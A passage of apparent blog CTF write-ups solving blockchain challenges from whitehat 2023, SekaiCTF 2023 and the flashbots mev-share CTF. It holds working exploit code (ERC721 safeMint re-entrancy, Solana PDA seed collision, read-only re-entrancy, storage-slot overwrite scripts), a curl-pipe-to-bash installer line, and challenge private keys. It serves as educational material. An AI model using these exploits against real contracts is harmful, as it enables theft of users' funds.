stack[3] => funcs zero slot: 0x60 => will be popped

stack[4] => y => will be popped

stack[5] => x => next call! => delegatecall()

...

some value I pushed

...

stack[?] => 0x97 => stop opcode

stack[?] => tokyoPayload function signature

PoC

Test.sol

https://gist.github.com/kangsangsoo/58bb7322d958323793f11e795a1139b0

payload.py

https://gist.github.com/kangsangsoo/3da37c9c95053436e74da8a9f98dfcfe

before pop4-ret

after pop4-ret

0x1a3 is JUMPDEST bypassing require statement within delegatecall(addr)

addr.call()

delegatecall opcode argument

0xcccc..cc would be logic contract address.

delegatecall(addr) return address

0xbbb.bbb would be delegatecall(addr) return address.

To finish this chaining, I put JUMPDEST which has STOP opcode.

In fact, 0xaaa..aaa was unnecessary so I could have reduced the number of calling load().

In conclusion, we went through the following flow:

tokyoPayload -> load -> load -> load -> resetGasLimit -> POP4-RET -> delegatecall -> STOP

Solve

solve.sol

https://gist.github.com/kangsangsoo/b8ddc278c2ec33db4eb27d7238a17bab

payload.py

https://gist.github.com/kangsangsoo/052286df7061cbdc62793cd32c9b4ac0

whitehat 2023 - blockchain

gss1 — Tue, 19 Sep 2023 00:50:33 +0900

Finally! a blockchain challenge was presented after Codegate at the domestic CTF.

Blockchain

pragma solidity ^0.8.13;
import "./token/ERC721.sol";

contract MintChocolate is ERC721 {
    bool public minted;
    uint256 public counter;

    constructor() ERC721("MintChocolate", "MC") {}
    function mint(uint256 amount) external {
        require(!minted, "No more mint");
        require(amount <= 10, "mint cap reached");

        for(uint256 i = 0; i < amount;) {
            _safeMint(msg.sender, counter++); // vulnerable
            
            unchecked {
                ++i;
            }
        }
        minted = true; // vulnerable
    }

    function goldenTicket() view external returns(bool) {
        return totalSupply() >= 100 ? true : false;
    }
}

Root cause

https://blocksecteam.medium.com/when-safemint-becomes-unsafe-lessons-from-the-hypebears-security-incident-2965209bda2a

It is recommended to use check-effects-interaction to prevent re-entrancy attack because using safemint would make a callback.

Since this code does not have any mitigations, an attacker could use re-entrancy attack to mint infinitely.

https://gss1.tistory.com/entry/HackTM-CTF-Quals-2023-smart-contractDragon-Slayer-Diamond-Heist

is the same root cause.

Solve

pragma solidity ^0.8.13;

import "./MintChocolate.sol";

contract Attack {

    MintChocolate public cho;
    bytes4 private constant _ERC721_RECEIVED = 0x150b7a02;

    uint public amt = 1;

    constructor (address _addr) {
        cho = MintChocolate(_addr);
    }

    function attack() public {
        cho.mint(10);
    }

    function onERC721Received(address operator, address from, uint256 tokenId, bytes calldata data) public returns (bytes4) {
        amt = amt + 1;
        if(amt > 10) return _ERC721_RECEIVED;
        else {
            cho.mint(10);
            return _ERC721_RECEIVED;
        }
    }
}

I'm a Python lover, so I always made and sent transactions by Web3py.

I learned various methods through this opportunity.

foundry

First, install foundry pacakge.

curl -L https://foundry.paradigm.xyz | bash

create new forge project

forge init ctf

Add contract codes to /src folder and commit them.

git commit -am " "

Deploy the attack contracts by create command

forge create [contract name] --rpc-url [rpc url] --private-key [private key]

e.g.

forge create MintChocolate --rpc-url http://127.0.0.1:8545 --private-key 0x8157bcd2b05ef0d7bce1a22ab85b68d4e23b425fcaf2544fa8e10965787364b1

If you put your attack code in the constructor, it can end there.

But if you need to send transaction and call..

cast send --private-key [private-key] [contract address] --rpc-url [rpc-url] [function signature]

e.g.

cast send --private-key 0x8157bcd2b05ef0d7bce1a22ab85b68d4e23b425fcaf2544fa8e10965787364b1 0x9c544AA42C097868210689929E0bc1B402a77C98 --rpc-url http://127.0.0.1:8545 "attack()"

cast call [contract address] --rpc-url [rpc-url] [function signature]

e.g.

cast call 0x59583FEE674F073A36681a127cFa2250AedE73Cd --rpc-url http://127.0.0.1:8545 "goldenTicket()"

hardhat

Install hardhat.

npm install hardhat

Create hardhat project.

npx hardhat

Add contracts codes to /contracts folder and change /scripts/deploy.js.

const hre = require("hardhat");

async function main() {
  // const mintChoco = await hre.ethers.deployContract("MintChocolate");
  const mintChoco = await hre.ethers.getContractAt("MintChocolate", "0x3cd6169a6Eac4d2045E67D113D537C1d70b59ADc");
  // await mintChoco.waitForDeployment();

  const mintChocoAddress = await mintChoco.getAddress();
  console.log(mintChocoAddress);

  const attack = await hre.ethers.deployContract("Attack", [mintChocoAddress]);
  await mintChoco.waitForDeployment();
  await attack.attack();

  console.log(await mintChoco.goldenTicket())
}

// We recommend this pattern to be able to use async/await everywhere
// and properly handle errors.
main().catch((error) => {
  console.error(error);
  process.exitCode = 1;
});

Change hardhat.config.js for CTF setting.

require("@nomicfoundation/hardhat-toolbox");

/** @type import('hardhat/config').HardhatUserConfig */
module.exports = {
  solidity: "0.8.13",
  networks: {
    ctf: {
      url: "http://127.0.0.1:8545",
      accounts: ["0x8157bcd2b05ef0d7bce1a22ab85b68d4e23b425fcaf2544fa8e10965787364b1",]
    }
  },
};

And execute!

npx hardhat --network ctf run deploy.js

remix + metamask

only possile if chainId is not 1.

Add a network to the metamask.

Add a private key provided by CTF to the metamask.

Change Remix VM to Injected Provider

If you can't see a new account in your account list, refresh and reconnect the Metamask

SekaiCTF 2023 - Blockchain(The Bidding, Play for Free, Re-Remix)

gss1 — Mon, 28 Aug 2023 02:45:49 +0900

I participated in SekaiCTF 2023 with CyKor.
The reason why this CTF is special is that it has blockchain prizes.

I won the second blood in one of the three challenges.

My writeups is https://github.com/kangsangsoo/CTF-Writeups/tree/main/SekaiCTF%202023

The Bidding

Analysis

Taking a look at framework/src/main.rs, we could get the following flow:

1. Admin sends 500sol, 1sol to rich_boi, user.

2. Product is created and auction starts.

3. Run solver's instructions.

4. rich_boi bids 100sol for the auction.

5. The auction is ended.

6. If user is a winner of the auction, it presents a flag.

If it has a normal flow, rich_boi becomes the winner because the user can only bid up to 1sol.

So I need the abnormal flows

for example

1. how to get user to have more than 100sol

2. how to get rich_boi to have less money than 100sol

3. how to end the auction before rici_boi bids

Root Cause

In framework/chall/programs/chall/src/lib.rs, we need a product to create the auction.

The PDA that contains Product struct is derived from some constraints:

1. re-initialization is not allowed

2. product_name and product_id are used as seeds

3. using canonical bump

#[derive(Accounts)]
#[instruction(product_name: Vec<u8>, product_id: [u8; 32])]
pub struct CreateProduct<'info> {
    #[account(
        init,
        seeds = [ &product_name[..], &product_id ],
        bump,
        payer = user,
        space = ACCOUNT_SIZE,
    )]
    pub product: Account<'info, Product>,

    #[account(mut)]
    pub user: Signer<'info>,

    pub system_program: Program<'info, System>,
    pub rent: Sysvar<'info, Rent>,
}

#[derive(Debug)]
#[account]
pub struct Product {
    pub name: Vec<u8>,
    pub id: [u8; 32],

    pub owner: Pubkey,

    pub is_auctioning: bool,
}

According to the constraint of auction account in Bid, an aunction is still in progress and the bid must be higher than the winning_bid_amount.

We also need a PDA to store the bid information.

It has some constraints:

1. re-init is not allowed

2. auction key and bidder key are used as seeds

3. using canonical bump

In this point, if a rich_boi cannot make a bid account

no matter how much sol he has, he can't participate in the bidding.

So the user can be winner in auction with 1sol.

Recalling the CreateProduct,

product PDA's seeds = product_name(Vec<u8>) + product_id([u8; 32]) could collide with

bid PDA's seeds = auction key(32-byte) + bidder key(32-byte)

By creating a product with the auction key as the product_name and the rich_boi key as the product_id, a seed collision occurs, preventing rich_boi from participating in the auction.

#[derive(Accounts)]
#[instruction(bid_amount: u64)]
pub struct Bid<'info> {
    #[account(
        init,
        seeds = [ &auction.key().as_ref(), &bidder.key().as_ref() ],
        bump,
        payer = bidder,
        space = ACCOUNT_SIZE,
    )]
    pub bid: Account<'info, BidInfo>,

    #[account(
        mut,
        seeds = [ product.key().as_ref(), &auction.name ],
        bump,
        constraint = !auction.has_ended,
        constraint = bid_amount > auction.winning_bid_amount,
    )]
    pub auction: Account<'info, Auction>,

    #[account(
        seeds = [ &product.name, &product.id ],
        bump,
    )]
    pub product: Account<'info, Product>,

    #[account(mut)]
    pub bidder: Signer<'info>,

    pub system_program: Program<'info, System>,
    pub rent: Sysvar<'info, Rent>,
}

So, seed collision could result in DoS attack.

Solve

#[program]
pub mod solve {
    use super::*;

    pub fn initialize(ctx: Context<Initialize>, name: Vec<u8>, seed: [u8; 32]) -> Result<()> {
        // solve goes here:

        let cpi_accounts = chall::cpi::accounts::Bid {
            bid: ctx.accounts.user_bid.to_account_info(),
            auction: ctx.accounts.auction.to_account_info(),
            product: ctx.accounts.product.to_account_info(),
            bidder: ctx.accounts.user.to_account_info(),
            system_program: ctx.accounts.system_program.to_account_info(),
            rent: ctx.accounts.rent.to_account_info(),
        };
        let cpi_ctx = CpiContext::new(ctx.accounts.chall.to_account_info(), cpi_accounts);
        chall::cpi::bid(cpi_ctx, 1 as u64)?;

        let cpi_accounts2 = chall::cpi::accounts::CreateProduct {
            product: ctx.accounts.fake_product.to_account_info(),
            user: ctx.accounts.user.to_account_info(),
            system_program: ctx.accounts.system_program.to_account_info(),
            rent: ctx.accounts.rent.to_account_info(),
        };
        let cpi_ctx2 = CpiContext::new(ctx.accounts.chall.to_account_info(), cpi_accounts2);
        chall::cpi::create_product(cpi_ctx2, name, seed)?;

        Ok(())
    }
}

#[derive(Accounts)]
pub struct Initialize<'info> {
    // feel free to expand/change this as needed
    // if you change this, make sure to change framework-solve/src/main.rs accordingly

    #[account(mut)]
    pub admin: AccountInfo<'info>,

    #[account(mut)]
    pub rich_boi: AccountInfo<'info>,

    #[account(mut)]
    pub user: Signer<'info>,

    #[account(mut)]
    pub auction: AccountInfo<'info>,

    #[account(mut)]
    pub product: AccountInfo<'info>,

    pub system_program: Program<'info, System>,

    pub chall: Program<'info, chall::program::Chall>,

    pub rent: Sysvar<'info, Rent>,

    // added
    #[account(mut)]
    pub user_bid: AccountInfo<'info>,
    #[account(mut)]
    pub fake_product: AccountInfo<'info>,
}

Play for Free

Analysis

This was written as https://github.com/hyperledger/solang

GitHub - hyperledger/solang: Solidity Compiler for Solana and Polkadot

Solidity Compiler for Solana and Polkadot. Contribute to hyperledger/solang development by creating an account on GitHub.

github.com

It's obviously Solidity but I was confused when I knew it was working on Solana.

In order to emit the flag, we must know the value of the initialized state variables in the constructor.

In detail, when we call play function, the tokens should be 0x1f, which is 0b11111 in binary.

That means tokens ^= 1, 2, 4, 8, 16 is executed.

In fact, since there is a way to get the data in the chain, I expected this challenge could be easily solved.

If this chall is related to EVM, I can use getStorageAt.

If this chall is related to Solana, I can use account.data.

Solve

My first challenge was how to call a function and

second one was how the storage layout was constructed.

In terms of Solidity, function selector is a 4-byte determined through sha3.

In terms of Solana, discriminator is a 8-byte determined through sha256.

Fortunately, thanks to the server code, I found out I needed a discriminator.

I wanted to know specifically, so I modified Solang's code and printed out the discriminator.

https://solana.stackexchange.com/questions/4992/how-can-i-get-the-discriminator-of-an-instruction-in-an-anchor-solana-idl

https://github.com/hyperledger/solang/blob/7774674eec37aeca048fb4a93f9eefcf8140c5a7/src/sema/ast.rs#L460

"global:tokens"
[215, 149, 40, 154, 182, 146, 65, 125]
"global:playCount"
[81, 212, 88, 253, 69, 244, 53, 0]
"global:find_string_uint64"
[9, 229, 75, 5, 193, 115, 105, 171]
"global:find_bytes32"
[85, 43, 21, 196, 243, 127, 55, 65]
"global:find_string"
[52, 228, 208, 77, 202, 97, 52, 46]
"global:play"
[213, 157, 193, 142, 228, 56, 248, 150]

The second difficulty was that I knew Solang stores state variable in data_account, but I didn't know how it was saved.

I looked it up on docs and github, but I couldn't get a clue.

So I modified the server code and figured out the layout through debugging.

https://github.com/kangsangsoo/CTF-Writeups/blob/main/SekaiCTF%202023/Play%20for%20Free/solve/src/lib.rs#L45

00..16 struct account_data_header
16..20 tokens
20..24 playCount
24..32 forgotten
32..36 pointer of stuckInGap
36..44 atBottom
44..76 somewhere
76..96 maybe header of string type..?
96..104 stuckInGap
104..120 I don't know
120..128 lookForIt
128..160 I don't know

Since we know all state variable values, we just call find functions and get a flag.

entrypoint!(process_instruction);
    fn process_instruction(
        program_id: &Pubkey,
        accounts: &[AccountInfo],
        instruction_data: &[u8],
    ) -> ProgramResult {
        let account_iter = &mut accounts.iter();
        let program = next_account_info(account_iter)?;
        let data_account = next_account_info(account_iter)?;
        let user = next_account_info(account_iter)?;
        let user_data = next_account_info(account_iter)?;
        let my_pg = next_account_info(account_iter)?;
        let sp = next_account_info(account_iter)?;

        // for debug
        {
            // let str = Rc::deref(&Rc::clone(&data_account.data)).borrow().deref();
            // msg!(&format!("{:?}", Rc::deref(&Rc::clone(&data_account.data)).borrow().deref()));
        }
        let forgotten:[u8; 8]  = Rc::deref(&Rc::clone(&data_account.data)).borrow().deref()[24..32].try_into().unwrap();
        let atBottom:[u8; 8] = Rc::deref(&Rc::clone(&data_account.data)).borrow().deref()[36..44].try_into().unwrap();
        let somewhere:[u8; 32] = Rc::deref(&Rc::clone(&data_account.data)).borrow().deref()[44..76].try_into().unwrap();
        let stuckInGap:[u8; 8] = Rc::deref(&Rc::clone(&data_account.data)).borrow().deref()[96..104].try_into().unwrap(); 
        let lookForIt:[u8; 8] = Rc::deref(&Rc::clone(&data_account.data)).borrow().deref()[120..128].try_into().unwrap();

        {
            let mut cont: Vec<u8> = vec![85, 43, 21, 196, 243, 127, 55, 65];

            cont.append(&mut somewhere.to_vec());
    
            let find_bytes32 = Instruction::new_with_bytes(
                program.key.clone(),
                &cont,
                vec![
                    AccountMeta::new(data_account.key.clone(), false),
                    AccountMeta::new(user.key.clone(), true),
                    AccountMeta::new_readonly(program.key.clone(), false),
                ],
            );
    
            invoke(&find_bytes32, 
                &[
                    user_data.clone(),
                    data_account.clone(),
                    user.clone(),
                    program.clone(),
                    my_pg.clone(),
                    sp.clone(),
            ]);
        }

        {
            let mut cont: Vec<u8> = vec![52, 228, 208, 77, 202, 97, 52, 46];
            let mut cont2: Vec<u8> = vec![8,0,0,0];
            
            cont.append(&mut cont2);
            cont.append(&mut lookForIt.to_vec());
    
            let find_string = Instruction::new_with_bytes(
                program.key.clone(),
                &cont,
                vec![
                    AccountMeta::new(data_account.key.clone(), false),
                    AccountMeta::new(user.key.clone(), true),
                    AccountMeta::new_readonly(program.key.clone(), false),
                ],
            );
    
            invoke(&find_string, 
                &[
                    user_data.clone(),
                    data_account.clone(),
                    user.clone(),
                    program.clone(),
                    my_pg.clone(),
                    sp.clone(),
            ]);
        }

        {
            let mut cont: Vec<u8> = vec![9, 229, 75, 5, 193, 115, 105, 171];
            let mut s1 = BorshSerialize::try_to_vec("Token Dispenser").unwrap();
    
            cont.append(&mut s1);
            cont.append(&mut forgotten.to_vec());
    
            let find_string_uint64 = Instruction::new_with_bytes(
                program.key.clone(),
                &cont,
                vec![
                    AccountMeta::new(data_account.key.clone(), false),
                    AccountMeta::new(user.key.clone(), true),
                    AccountMeta::new_readonly(program.key.clone(), false),
                ],
            );
    
            invoke(&find_string_uint64, 
                &[
                    user_data.clone(),
                    data_account.clone(),
                    user.clone(),
                    program.clone(),
                    my_pg.clone(),
                    sp.clone(),
            ]);
        }

        {
            let mut cont: Vec<u8> = vec![9, 229, 75, 5, 193, 115, 105, 171];
            let mut s1 = BorshSerialize::try_to_vec("Token Counter").unwrap();
    
            cont.append(&mut s1);
            cont.append(&mut stuckInGap.to_vec());
    
            let find_string_uint64 = Instruction::new_with_bytes(
                program.key.clone(),
                &cont,
                vec![
                    AccountMeta::new(data_account.key.clone(), false),
                    AccountMeta::new(user.key.clone(), true),
                    AccountMeta::new_readonly(program.key.clone(), false),
                ],
            );
    
            invoke(&find_string_uint64, 
                &[
                    user_data.clone(),
                    data_account.clone(),
                    user.clone(),
                    program.clone(),
                    my_pg.clone(),
                    sp.clone(),
            ]);
        }

        {
            let mut cont: Vec<u8> = vec![9, 229, 75, 5, 193, 115, 105, 171];
            let mut s1 = BorshSerialize::try_to_vec("Arcade Machine").unwrap();
    
            cont.append(&mut s1);
            cont.append(&mut atBottom.to_vec());
    
            let find_string_uint64 = Instruction::new_with_bytes(
                program.key.clone(),
                &cont,
                vec![
                    AccountMeta::new(data_account.key.clone(), false),
                    AccountMeta::new(user.key.clone(), true),
                    AccountMeta::new_readonly(program.key.clone(), false),
                ],
            );
    
            invoke(&find_string_uint64, 
                &[
                    user_data.clone(),
                    data_account.clone(),
                    user.clone(),
                    program.clone(),
                    my_pg.clone(),
                    sp.clone(),
            ]);
        }

        {
            let mut cont: Vec<u8> = vec![213, 157, 193, 142, 228, 56, 248, 150];
    
            let play = Instruction::new_with_bytes(
                program.key.clone(),
                &cont,
                vec![
                    AccountMeta::new(data_account.key.clone(), false),
                    AccountMeta::new(user.key.clone(), true),
                    AccountMeta::new_readonly(program.key.clone(), false),
                ],
            );
    
            invoke(&play, 
                &[
                    user_data.clone(),
                    data_account.clone(),
                    user.clone(),
                    program.clone(),
                    my_pg.clone(),
                    sp.clone(),
            ]);
        }
       
        Ok(())        
    }

Re-Remix

Analysis

├── Equalizer.sol
├── FreqBand.sol
├── MusicRemixer.sol
├── SampleEditor.sol

In MusicRemixer.sol, setup contract, if the level of song is 30 or more than, it emits a flag.

The level of song is determined by the multiplication of tempo of SampleEditor and complexity of Equalizer.

First, the tempo is a state variable of SampleEditor and is set by adjust function.

To avoid a revert in adjust function, I have to change a value in mapping through updateSetting function that is able to change a value of storage slot.

The skills required here are to calculate storage slot number for mapping and dynamic objects.

I knew roughly how to do it, but I've never actually done it, so it took me a while.

But there's a huge trick, and if I use debugger, I don't actually have to calculate it..

For my study, I also wrote python script.

in remix

Eqaulizer.sol is an example code that implements the stable swap of curve finance as solidity.

What we have to do is make the return value of the getVirtualPrice function change.
However, considering the stable swap, this might be impossible considering that the amount of ether we have is one.

Root Cause

This challenge is an example of read-only re-entrancy.

https://chainsecurity.com/curve-lp-oracle-manipulation-post-mortem/

Curve LP Oracle Manipulation: Post Mortem

What if you could manipulate Curve's oracles to exploit major DeFi protocols? Read about the technical details of read-only reentrency attacks.

chainsecurity.com

When removing the LP token by removeLiqudity(), the transfer of Ether exists and re-entrancy is possible for the getVirtualPrice() function.

Since the invariant is still broken, the get virtual price is unstable, so I can call finish and emit the flag through receive().

Solve

pragma solidity 0.8.19;

import "./Equalizer.sol";
import "./MusicRemixer.sol";
import "./SampleEditor.sol";

contract Attack {
    
    Equalizer public E;
    SampleEditor public SE;
    MusicRemixer public MR;

    constructor(address se, address mr, address e) payable{
        E = Equalizer(e);
        SE = SampleEditor(se);
        MR = MusicRemixer(mr);
    }

    receive() payable external {
        MR.finish();
    }

    function attack() external {
        uint[3] memory amt;
        amt[0] = 10**18 - 36516516511234512;
        E.increaseVolume{value:amt[0]}(amt);
        E.decreaseVolume(E.volumeGainOf(address(this)));
    }
}

from web3 import Web3
import json
from solc import compile_source
import time
w3 = Web3(Web3.HTTPProvider("http://re-remix-web.chals.sekai.team/97feb6dd-eda1-4097-8694-e039e816e14b"))
#Check Connection
t=w3.is_connected()
print(t)

# Get private key 
prikey = '0x07b1c315909058c038bc2d3dcd0382c2d64c378c6d6200fb26615d0bacae63bc'

# Create a signer wallet
PA=w3.eth.account.from_key(prikey)
Public_Address=PA.address

print(Public_Address) # 0x1A422f86D5381E84b01907ddF0E53fa9A6B2a3B3

myAddr = Public_Address

MR_addr = "0x88aBc46b2D004FFd51E6246f04bDDB8E247DD89D"
SE_addr = "0xA3e98779924Ee0468b6e22468a69B542945f7e07"
S_addr = "0x55739f7e32eD132cAb6eBb095B3ec6e84B42DD0f"
E_addr = "0xE056699Af3564f767E15EF2446972A4B78A173Dd"
attack_slot = 0x5ebfdad7f664a9716d511eafb9e88c2801a4ff53a3c9c8135d4439fb346b50bf
attack_input = 0x0000000000000000000000000000000000000000000000000000000000000100

def attackSE():
    f = open('SE.abi', 'r')
    abi_txt = f.read()
    abi = json.loads(abi_txt)
    contract = w3.eth.contract(address=SE_addr, abi=abi)
    func_call = contract.functions["updateSettings"](attack_slot, attack_input).build_transaction({
        "from": myAddr,
        "nonce": w3.eth.get_transaction_count(myAddr),
        "gasPrice": w3.eth.gas_price,
        "value": 0,
        "chainId": w3.eth.chain_id,
    })
    signed_tx = w3.eth.account.sign_transaction(func_call, prikey)
    result = w3.eth.send_raw_transaction(signed_tx.rawTransaction)
    transaction_receipt = w3.eth.wait_for_transaction_receipt(result)
    print(transaction_receipt)

    func_call = contract.functions["setTempo"](233).build_transaction({
        "from": myAddr,
        "nonce": w3.eth.get_transaction_count(myAddr),
        "gasPrice": w3.eth.gas_price,
        "value": 0,
        "chainId": w3.eth.chain_id,
    })
    signed_tx = w3.eth.account.sign_transaction(func_call, prikey)
    result = w3.eth.send_raw_transaction(signed_tx.rawTransaction)
    transaction_receipt = w3.eth.wait_for_transaction_receipt(result)
    print(transaction_receipt)

    func_call = contract.functions["adjust"]().build_transaction({
        "from": myAddr,
        "nonce": w3.eth.get_transaction_count(myAddr),
        "gasPrice": w3.eth.gas_price,
        "value": 0,
        "chainId": w3.eth.chain_id,
    })
    signed_tx = w3.eth.account.sign_transaction(func_call, prikey)
    result = w3.eth.send_raw_transaction(signed_tx.rawTransaction)
    transaction_receipt = w3.eth.wait_for_transaction_receipt(result)
    print(transaction_receipt)

def attack_deploy():
    f = open("att.abi", "r"); contract_abi= f.read(); f.close()
    f = open("att.bin", "r"); contract_bytecode= f.read(); f.close()

    contract = w3.eth.contract(abi=contract_abi, bytecode=contract_bytecode)
    transaction = contract.constructor(SE_addr, MR_addr, E_addr).build_transaction(
        {
            "chainId": w3.eth.chain_id,
            "gasPrice": w3.eth.gas_price,
            "from": Public_Address,
            "nonce": w3.eth.get_transaction_count(Public_Address),
            "value": 10**18 - 26516516511234512
        }
    )
    sign_transaction = w3.eth.account.sign_transaction(transaction, private_key=prikey)
    print("Deploying Contract!")
    # Send the transaction
    transaction_hash = w3.eth.send_raw_transaction(sign_transaction.rawTransaction)
    # Wait for the transaction to be mined, and get the transaction receipt
    print("Waiting for transaction to finish...")
    transaction_receipt = w3.eth.wait_for_transaction_receipt(transaction_hash)
    print(transaction_receipt)
    print(f"Done! Contract deployed to {transaction_receipt.contractAddress}")
    addr =  str(transaction_receipt.contractAddress)

    contract = w3.eth.contract(address=addr, abi=contract_abi)
    func_call = contract.functions["attack"]().build_transaction({
        "from": myAddr,
        "nonce": w3.eth.get_transaction_count(myAddr),
        "gasPrice": w3.eth.gas_price,
        "chainId": w3.eth.chain_id,
    })
    signed_tx = w3.eth.account.sign_transaction(func_call, prikey)
    result = w3.eth.send_raw_transaction(signed_tx.rawTransaction)
    transaction_receipt = w3.eth.wait_for_transaction_receipt(result)
    print(transaction_receipt)

attackSE()
attack_deploy()

flashbot mev-share ctf

gss1 — Tue, 8 Aug 2023 17:06:40 +0900

I participated in flashbot mev-share ctf, my first time to study mev-share.

I solved 9 challenges except MevMagicNumberV3.

Actually, it was difficult for me to write a solve code using typescript and rust, so I decided to use python familar to me.

https://github.com/flashbots/mev-share-client-ts

https://github.com/paradigmxyz/mev-share-rs

Most of the participants seem to use the above libraries.

My solve sciprts are

https://github.com/kangsangsoo/CTF-Writeups/tree/main/mev-share-ctf

mev-share

https://docs.flashbots.net/flashbots-mev-share/overview

I don't know enough to explain mev-share in detail yet, so please refer to the link above.

MevShareCTFSimple

contract code

contract MevShareCTFSimple is MevShareCTFBase {
    uint256 public activeBlock;

    uint256 immutable captureId;

    event Activate();

    constructor(MevShareCaptureLogger _mevShareCaptureLogger, uint256 _captureId) MevShareCTFBase(_mevShareCaptureLogger) payable {
        captureId = _captureId;
    }

    function activateRewardSimple() external payable onlyOwner {
        activeBlock = block.number;
        emit Activate();
    }

    function claimReward() external {
        require (activeBlock == block.number);
        activeBlock = 0;
        mevShareCaptureLogger.registerCapture(captureId, tx.origin);
    }
}

V1

https://goerli.etherscan.io/address/0x98997b55Bb271e254BEC8B85763480719DaB0E53#code

data from SSE

{
  "hash": "0x3826165395e100a7c20bce858ffc22e590d36451e11ca496d8b95c9bf6c493eb",
  "logs": [
    {
      "address": "0x98997b55bb271e254bec8b85763480719dab0e53",
      "topics": [
        "0x59d3ce47d6ad6c6003cef97d136155b29d88653eb355c8bed6e03fbf694570ca"
      ],
      "data": "0x"
    }
  ],
  "txs": null,
  "mevGasPrice": "0x2faf080",
  "gasUsed": "0x7530"
}

If logs address == contract address, then send the following bundle.

bundle = {
  hash,
  tx of calling claimReward(),
}

V2

https://goerli.etherscan.io/address/0x65459dD36b03Af9635c06BAD1930DB660b968278#code

V1 and V2 are a little different.

{
  "hash": "0xa4d03b2243c447ee5249f5005dc67ca068c4223de38124e4311df16cc5d8c6fc",
  "logs": null,
  "txs": [
    {
      "to": "0x65459dd36b03af9635c06bad1930db660b968278",
      "functionSelector": "0xa3c356e4"
    }
  ],
  "mevGasPrice": "0x2faf080",
  "gasUsed": "0x7530"
}

If txs to == contract address, then send the following bundle.

bundle = {
  hash,
  tx of calling claimReward(),
}

V3

https://goerli.etherscan.io/address/0x1cdDB0BA9265bb3098982238637C2872b7D12474#code

It is equal to V2.

{
  "hash": "0x062e018cc7685ef29876fdfca8559f4815d372987adb61d48ee0e33a0594aa61",
  "logs": null,
  "txs": [
    {
      "to": "0x1cddb0ba9265bb3098982238637c2872b7d12474",
      "functionSelector": "0xa3c356e4",
      "callData": "0xa3c356e4"
    }
  ],
  "mevGasPrice": "0x2faf080",
  "gasUsed": "0x7530"
}

V4

https://goerli.etherscan.io/address/0x20a1A5857fDff817aa1BD8097027a841D4969AA5#code

We only know the hash from SSE.

We can put our transaction behind any transaction and wait until it succeeds.

If a block has a transaction activeBlock() call ahead of the transaction I put in it, it succeeds.

{
  "hash": "0x8e586a5ec514d85e3b8d5337e89c8459b9899a70d370fdf96d0f8e226b7d04e4",
  "logs": null,
  "txs": null,
  "mevGasPrice": "0x2faf080",
  "gasUsed": "0x7530"
}

bundle = {
  any hash,
  tx of calling claimReward(),
}

MevShareCTFTriple

https://goerli.etherscan.io/address/0x1eA6Fb65BAb1f405f8Bdb26D163e6984B9108478#code

contract MevShareCTFTriple is MevShareCTFBase {
    uint256 public activeBlock;

    mapping (address => mapping (uint256 => uint256)) addressBlockCount;

    event Activate();

    constructor(MevShareCaptureLogger _mevShareCaptureLogger) MevShareCTFBase(_mevShareCaptureLogger) payable {
    }

    function activateRewardTriple() external payable onlyOwner {
        activeBlock = block.number;
        emit Activate();
    }

    function claimReward() external {
        require (activeBlock == block.number);
        require (tx.origin == msg.sender);
        uint256 claimCount = addressBlockCount[tx.origin][block.number] + 1;
        if (claimCount == 3) {
            mevShareCaptureLogger.registerCapture(401, tx.origin);
            return;
        }
        addressBlockCount[tx.origin][block.number] = claimCount;
    }
}

{
  "hash": "0x0f016bf66c03ff8f017b84b2a59d1cd915b1456d768d341d2832bb8f5ca7d1cb",
  "logs": [
    {
      "address": "0x1ea6fb65bab1f405f8bdb26d163e6984b9108478",
      "topics": [
        "0x59d3ce47d6ad6c6003cef97d136155b29d88653eb355c8bed6e03fbf694570ca"
      ],
      "data": "0x"
    }
  ],
  "txs": null,
  "mevGasPrice": "0x2faf080",
  "gasUsed": "0x7530"
}

You have to call claimReward() 3 times in the same block.

Note that the nonce should increases

bundle = {
  hash,
  tx of calling claimReward(),
  tx of calling claimReward(),
  tx of calling claimReward(),
}

MevShareCTFNewContracts

https://goerli.etherscan.io/address/0x5eA0feA0164E5AA58f407dEBb344876b5ee10DEA#code

contract MevShareCTFNewContracts is MevShareCTFBase {
    uint256 public magicNumber;

    // maps addresses to child contracts, acts both as check for valid caller and which CTF is being targeted
    //  value of 1 = emitted by address
    //  value of 2 = emitted by salt
    mapping (address => uint256) childContracts;

    event Activate(address newlyDeployedContract);
    event ActivateBySalt(bytes32 salt);

    constructor(MevShareCaptureLogger _mevShareCaptureLogger) MevShareCTFBase(_mevShareCaptureLogger) payable {
    }

    function proxyRegisterCapture() external {
        uint256 childContractType = childContracts[msg.sender];
        if (childContractType == 0) {
            revert("Not called by a child contract");
        }
        mevShareCaptureLogger.registerCapture(300 + childContractType, tx.origin);
    }

    function activateRewardNewContract(bytes32 salt) external payable onlyOwner {
        MevShareCTFNewContract newlyDroppedContract = new MevShareCTFNewContract{salt: salt}();
        childContracts[address(newlyDroppedContract)] = 1;
        emit Activate(address(newlyDroppedContract));
    }

    function activateRewardBySalt(bytes32 salt) external payable onlyOwner {
        MevShareCTFNewContract newlyDroppedContract = new MevShareCTFNewContract{salt: salt}();
        childContracts[address(newlyDroppedContract)] = 2;
        emit ActivateBySalt(salt);
    }
}

contract MevShareCTFNewContract {
    MevShareCTFNewContracts immutable mevShareCTFNewContracts;
    uint256 public activeBlock;

    constructor() payable {
        mevShareCTFNewContracts = MevShareCTFNewContracts(msg.sender);
        activeBlock = block.number;
    }

    function claimReward() external {
        require (activeBlock == block.number);
        activeBlock = 0;
        mevShareCTFNewContracts.proxyRegisterCapture();
    }
}

MevShareCTFNewContracts makes a new contract with salt using create2.

We can calcaulate that address before it is made because it is deterministic address.

V1

logs include the new contract address. So we can just call claimReward().

{
  "hash": "0x8f4daf824ce07ef5188247addae10c603634e3e2a81739f9c56be65ddecabec3",
  "logs": [
    {
      "address": "0x5ea0fea0164e5aa58f407debb344876b5ee10dea",
      "topics": [
        "0xf7e9fe69e1d05372bc855b295bc4c34a1a0a5882164dd2b26df30a26c1c8ba15"
      ],
      "data": "0x000000000000000000000000e4e76109da7b05c28f7df8c0116ad9cf75beeafb"
    }
  ],
  "txs": null,
  "mevGasPrice": "0x2faf080",
  "gasUsed": "0x27100"
}

V2

logs data includes the salt used to make the new one so that we can calculate the new address.

 {
  "hash": "0x703834fb1f5826597e522a0eefd726bdf47b16119a10fcb53331da88b7c618ee",
  "logs": [
    {
      "address": "0x5ea0fea0164e5aa58f407debb344876b5ee10dea",
      "topics": [
        "0x71fd33d3d871c60dc3d6ecf7c8e5bb086aeb6491528cce181c289a411582ff1c"
      ],
      "data": "0xbdbaf29470fe0ba323d11900b4f327ba382dfdf8e7cd4f3cd87349c0905b81d0"
    }
  ],
